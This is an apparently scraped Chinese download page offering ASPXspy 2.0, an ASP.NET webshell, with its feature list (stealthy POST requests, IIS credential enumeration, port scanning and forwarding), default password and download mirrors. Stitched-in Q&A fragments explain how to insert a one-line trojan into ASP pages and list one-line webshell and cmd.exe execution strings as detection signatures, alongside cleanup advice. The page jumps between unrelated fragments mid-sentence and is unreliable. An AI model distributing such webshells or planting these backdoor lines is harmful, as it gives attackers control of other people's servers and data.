ASPXspy 2.0 asp.net 网页木马 源码下载

来源:脚本之家  责任编辑:小易  

应该是在你的网站上被传入一了个木马程序,他运行一次就修改你所有ASP文件,增加这些代码。我网站也有这样的经验。 处理方案:先检查你网站上的文件,发现不是自己写的程

源码大小:17KB 源码语言:简体中文 源码类型:国产软件 源码授权:免费软件 更新时间:2020-06-01 源码类别:黑客源码 源码官网: 网友评分:源码评分 应用平台:Windows平台 1.开发环境VS2008 + C#,兼容FrameWork1.1/2.0,基本实现代码分离,CSS方便参考了phpspy。

2.密码为32位MD5加密(小写) 默认为 admin.

完整 去掉官方后台 跟踪暗链 一般下载的 你知道的 要不就是漏洞 要不就是木马 不要就是 功能不全 需要网站维护|网页修改|网站故障处理|asp,php程序错误|数据库维护|建网站

3.全部采用POST方式提交数据,增强了隐蔽性。

asp页面是在其他的ASP页面里面执行生成的文件,当你打开IE访问的时候它执行,关闭IE的时候就没有执行,所以在空间找不到,你把所有的文件下载来找一下里面是否有恶意代码

4.增强了IIS探测功能,遍历IIS站点信息,绝对路径,多域名绑定,以及IIS账号密码。

ASP怎么能是病毒呢? asp病毒一般是一种网页木马代码,本身不具备伤害,而是会链接到指定网站下载可执行病毒。 楼上说的对 ASP起到了个搭桥的作用

5.增加了对指定文件的搜索功能。

程序编制问题(前台后台都一样),所以删除后台也没有用啊 建议找人修补漏洞,如果不行自己又无法搞定,建议用静态页面弄几个简单网页好了

6.修正了一些数据库操作的BUG。

IIS 面板中的“脚本资源访问”不是指可以执行脚本的权限,而是指可以访问源代码的权 Internet 来宾帐号(ASP.NET 程序的上传目录是 IIS_WPG 组)的写权限。 如果下载时,是

7.增强了对注册表的读取,此部分由BloodSword完成,在此感谢。

利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过 当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒

8.修正了对端口的多线程扫描

建议你用eesafe网站安全检测工具扫描一下网站代码 或者到eesafe官网进行漏洞扫描 认证站长之后可以申请人工测试

9.增强了端口转发功能,参考了Cnqing的一些代码,在此感谢。

这个。。。 牵涉到技术问题 不好说的 很有可能是服务器被攻击了 所有该服务器能支持的网页代码都被植入了相关木马文件 呵呵 我仅仅是猜测 具体还要看技术人员的

免责声明:此工具为安全检测工具,任何人使用此工具,做违法国家法律的事情,责任自负!

IIS 面板中的“脚本资源访问”不是指可以执行脚本的权限,而是指可以访问源代码的权 来宾帐号(ASP.NET 程序的上传目录是 IIS_WPG 组)的写权限。 假如下载(DownLoad)时

联系方式:E-mail:master@rootkit.net.cn

一般情况下是做不到的,木马喜欢这么干. 你想想:如果你租了个虚拟主机,然后,你用程序可以随意调用服务器上的程序(文件),那就等于这个服务器都是你的了.

下载地址如下:

1,恢复网页代码,一般这样的病毒会在网页中添加恶意代码,用DW批量删除或网页恶意代码查杀软件删除。 2,查杀“backdoor.asp.ace.f”,在网上搜索专杀软件清除,如安全卫士

网站有漏洞很正常的,可以把不需要写权限的文件夹改成只读,这样会避免一些,还有就是自己盯紧点,及时清除,查看一下你的网站里面有没有木马之类的

迅雷高速下载1

四五互联移动下载

群英网络电信下载

巨牛网络电信下载

创梦网络电信下载

酷云中国网通下载

亿恩科技电信下载

万达网络电信下载

徐州枫信网通下载

360集群电信下载

酷云中国电信下载

云彩网络双线下载

腾正科技电信下载

微子网络电信下载

扩展阅读,根据您访问的内容系统为您准备了以下内容,希望对您有帮助。

如何在asp网页中插入一句话木马

抛开职业道德,在ASP网页中插入一句话木马大致可以这样做:

通常是在页面所有代码(可以通过类似 Adobe Dreamwaver,或者记事本之类打开页面“源代码”)末尾,加入你想插入的代码。但前提是你的代码本身是可以执行的。因为ASP页面本身在“打印”到浏览器时,已经完成了程序的运行。

那么,按照木马的特点,其实在页面中间任何HTML代码中都可以插入木马语句。这里提到的HTML和ASP代码是不一样的,区别在于:

ASP代码通常以“<%...%>”来标识。而HTML代码通常以“<.../>”来标识,那么,木马语句要插入到一段完整的语句之外才可以,否则将会被浏览器错误翻译导致页面打乱。比如:

----------------------------------------------------

<HTML>

<Head>标题</head>

<%......%>

木马代码片段

<body>

<table><tr><TD></td>木马片段<td></td></tr></table>

</body>

怎样轻松获取网页的ASP源代码?

泼个冷水先!任何方式都不会轻松如果轻松拿到还有什么安全性可言如果真想要,可以偿试检测服务器漏洞,黑了服务器再拿代码或检测asp漏洞(这个比较可行),然后通过asp木马等工具直接下载

如何找出asp网页中的垃圾代码

后门和木马一般是以可执行文件的形式存在的,后门或者有木马一般不会集成在下载的网站系统里,因为,当你解压,里面的可执行文件出现时,防毒软件就会马上杀死,而且会有相应的报告,自然,你就不会再采用了,呵呵!当然,如果要在ASP里集成后门和木马也未必不可,要做的话,就弄一个链接吧!如果链接的网站里,有木马和后门,自然,就达到目的了!不过,一般他们是不会这样做的!假设他们真的这样做,那么你就可以查看你下载系统里所有网络链接!你可以用文本形式,打开每个ASP、js 和HTML文件,然后查找里面的链接关键字:http://或www.找到的话,一个一个查看,或者干脆删除掉,呵呵,慢慢搞!哦,还有,查找也可以利用操作系统里的文件内关键字查找效率更好!

ASP网站老中木马,如何预防及清除

关于ASP防马法 给你以下供参考:1. 时间比较法   按时间顺序找到最近被改动的asp文件 ,打开看下,是不是木马呢,什么,看不懂代码, 那你就把不是你自己放的asp文件,名字看一眼就看的出的。比如说diy.ap.dm6.asp,angel.asp.shell.asp什么的文件,可疑的asp文件不是你自己创建的删除,或直接访问下看下是不是木马就可以了   2. 查找关键字,asp木马都是有关键字的,也就像病毒的特征码,我们用windows自带的搜索功能就能查找到 ,查找包含内容为关键字的所有文件就可以了,找到以后看下就可以了,有时候能查找到一些asp的大文件,如果是虚拟主机的话,一般是数据库文件改成asp的了,如果是一句话木马的关键字就小心了,如果是大型木马的关键字,咱们访问一下看看,我不赞成把数据库改成asp的,至于为什么,大家都知道吧。  我整理了一些特征码,现在给大家 gxgllcx<script RUNAT=SERVER LANGUAGE=JAVAscript>eval(Request.form(’#’)+’’)</script> 输入马的内容 session("b") request("kker") 非常遗憾,您的主机不支持ADODB.Stream,不能使用本程序 传至服务器已有虚拟目录 警告:对非法使用此程序可能带来的任何不良后果责任自负!请勿用于非法用途!!! <%execute request("value")%> ccopus <%execute(request("#"))%> <script language="vbscript" runat=server>if reques(#")<>"" then execute(request("#"))</script> ("cmd.exe /c "&request.form("cmd")). ("cmd.exe /c "&request("cmd")). ("cmd.exe /c "&request("c")).   这些都是关键字了,全部是我从木马里面一个一个提取出来的,如果有这些特征的话,一般都是木马 ,不过大家最好打开看一下,不排除特殊情况。如果你的网站里,有类似代码:<iframe src="http://www.***.com" ></iframe> 估计可能是被加入的恶意连接,或着被挂马了,好狠毒,那么请在关键词中搜索iframe src,   3. 大家也可以用明小子的asp木马扫描的这个小工具拉,把我的关键字放进去,扫描一下,挺方便的,呵呵   4. 在网站结构清楚的情况下,浏览目录法能快速确定木马,在不该出现的地方出现的文件,管他是不是木马都可以删,比如说dvbbs下的 upfile这些文件夹里是不应该出现asp文件的,我们一发现就删除就是了 ,不过要求管理员对自己的网站目录结构熟  5. 有一种方法可以试下,就是做好备份,一旦发现有人入侵,马上还原,这样什么木马也不怕了,不过要注意的是,把保证备份文件是安全的 ,要是备份文件里也有木马,让就没搞一样的   6. 用asp木马追捕的文件,查杀,网上有下载的,另外我们常用的杀毒软件也有这样的功能,我推荐大家采用卡巴斯机,效果非常好,几乎能查杀如今所有流行的asp木马   上面只是简单的介绍了一下,asp木马的一些查杀方法,当然这些只是亡养补牢了,我们最好对服务器系统进行严格的权限*,让黑客即使是上传了木马也没有什么用,这里权限的*我就不多说了等下不知道要写多少,网上的资料也很全面的,大家可以自己去查找西。而且现在说来说去,asp木马的隐藏方法确实是很高明,asp木马代码加密,图片合并,文件时间修改,还有要命的系统漏洞利用等等这对于要百分之百查杀asp木马的查杀,几乎不可能,我们只有堵住木马上传的源头 ,asp程序尽量用最新版本,网站中的上传途径自己应该特别注意,对于不需要脚本运行的文件夹在iis里面设置,执行许可为无,还有就是管理员要求有良好的安全意识,不然的话,谈不上安全了,并且我们设置了权限之后, 传了也是白传。

  • 本文相关:
  • 如何在asp网页中插入一句话木马
  • 怎样轻松获取网页的ASP源代码?
  • 如何找出asp网页中的垃圾代码
  • ASP网站老中木马,如何预防及清除
  • asp后门木马代码是社么
  • asp文件里的木马程序怎么清除
  • 关于网页后台管理代码的Admin_Honor.asp内容修改之后为什么...
  • 黑客上传asp木马到网站服务器目录下,浏览器能打开,但在目录...
  • asp 病毒 特性
  • asp网站中木马,我把后台程序全部删除了,只留下前台和数据库...
  • 请问IIS中如何开通权限呢?ASP网页老是不显示!座等高手相助!
  • 跪求网站nul.asp木马删除方法。
  • 网页老是被挂ASP木马,后台总是被入侵,怎么办
  • 网页源代码正常上传到服务器页面中自动会被加入木马JS文件
  • 请问IIS中如何开通权限呢?ASP网页老是不显示!座等高手相助!
  • asp代码 如何让客户在客户端打开ASP网页,然后在服务端上打...
  • 网页中了backdoor.asp.ace.f木马怎样解决
  • asp网页里写代码
  • 问:ASP是什么?ASP根据什么制作木马的?ASP木马和大马有什...
  • 网站首页源码下载asp源码php源码.net源码jsp源码软件开发脚本下载js框架网站地图网页游戏黑客源码数据库类其它源码整站系统博客程序留言聊天企业网站新闻文章ajax相关搜索链接文件管理交友会员上传下载投票调查框架模板整站系统新闻文章留言聊天博客系统贺卡图片ajax相关文件管理问答系统社区论坛上传下载整站系统控件组件新闻文章主机域名计数统计小偷采集电子商务学校班级 社区论坛上传下载投票调查blog程序留言聊天整站系统社区论坛上传下载投票调查数据管理jsp其它c#源码易语言源码delphi源码vb源码java源码其它菜单导航tab标签焦 点 图在线客服css特效相册代码flash特效批处理其它jqueryextjsprototypemootoolsajax/javascript其它框架主页源码下载黑客源码网站管理软件 aspxspy2014 final最终版aspxspyasp.net网页木马一句话木马客户端集合 学习专用打包一句话木马客户端集合 学习专用打包下载phpjackal 强大的一款php网页后门(php 木马)phpjackal 强大的一款php网页后门(php 木马)下载asp 木马源码打包asp 木马源码打包下载免杀aspx木马代码 适合学习免杀aspx木马代码 适合学习下载phpshell 木马源码发布(注意防范)phpshell 木马源码发布(注意防范)下载整站文件备份打包系统aspwebpack 整站文件备份打包系统aspwebpack 下载aspxspy 2.0 asp.net 网页木马aspxspy 2.0 asp.net 网页木马下载啊d小工具 目录读写检测asp版 (附一个aspx版)啊d小工具 目录读写检测asp版 (附一个aspx版)下载网站管理软件 aspxspy2014 final最终版网站管理软件 aspxspy2014 final最终版下载找不到分享码?网站防被cc攻击系统php源码网站管理软件 aspxspy2014 final最终版phpshell 木马源码发布(注意防范)啊d小工具 目录读写检测asp版 (附一个aspx版)啊d小工具 目录读写检测 [asp与asp.net版] 一句话木马客户端集合 学习专用打包asp 木马源码打包免杀aspx木马代码 适合学习phpjackal 强大的一款php网页后门(php 木马)aspxspy 2.0 asp.net 网页木马分享码的获取方法迅雷winrar v5微信小程序androidasp源码生活购物php源码asp.net源码jsp源码软件开发移动开发网页游戏黑客源码数据库类网页编辑器其它源码网站防被cc攻击系统php源码网站管理软件 aspxspy2014 final最终版phpshell 木马源码发布(注意防范)啊d小工具 目录读写检测asp版 (附一个aspx版)一句话木马客户端集合 学习专用打包啊d小工具 目录读写检测 [asp与asp.net版] asp 木马源码打包免杀aspx木马代码 适合学习phpjackal 强大的一款php网页后门(php 木马)aspxspy 2.0 asp.net 网页木马chrome
    免责声明 - 关于我们 - 联系我们 - 广告联系 - 友情链接 - 帮助中心 - 频道导航
    Copyright © 2017 www.zgxue.com All Rights Reserved

    九色优选 | 跳跳猪 | 聚聚玩 | 有赚网 | 聚享游 | 快乐赚